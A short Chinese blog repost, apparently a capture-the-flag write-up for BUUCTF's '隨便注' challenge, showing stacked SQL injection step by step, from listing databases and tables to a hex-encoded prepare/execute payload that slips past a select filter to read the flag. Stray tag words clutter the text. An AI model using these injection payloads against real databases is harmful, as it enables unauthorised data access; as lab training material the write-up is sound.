堆疊注入——BUUCTF-隨便注

時間 2019-11-07

標籤堆疊注入 buuctf 隨便简体版

原文原文鏈接

由題目提示知道，這題須要進行sql注入node

輸入1'發現報錯sql

再輸入1';show batabases#出現了一大堆數據庫數據庫

再輸入1';show tables#出現了兩個表編碼

猜想flag在這2個表中，輸入1';show create table `1919810931114514`;嘗試打開表1，發現3d

由於select被過濾了，因此先將select * from `1919810931114514`進行16進制編碼blog

再經過構造payload，得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn？inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#table

進而獲得flagselect

1. BUUCTF——隨便注
2. SQL Injection8(堆疊注入)——強網杯2019隨便注
3. 2019強網杯隨便注堆疊注入
4. BUUCTF-強網杯-隨便注
5. BUUCTF--WEB 隨便注 1
6. sql注入 - 堆疊注入
7. sql注入——堆疊注入
8. supersqli--堆疊注入
9. BUUCTF[強網杯 2019]隨便注 writeup
10. buuctf 2019強網杯隨便注
更多相關文章...
• SQLite 注入 - SQLite教程
• Spring DI（依賴注入）的實現方式：屬性注入和構造注入 - Spring教程
• Spring Cloud 微服務實戰(三) - 服務註冊與發現
• YAML 入門教程

相關標籤/搜索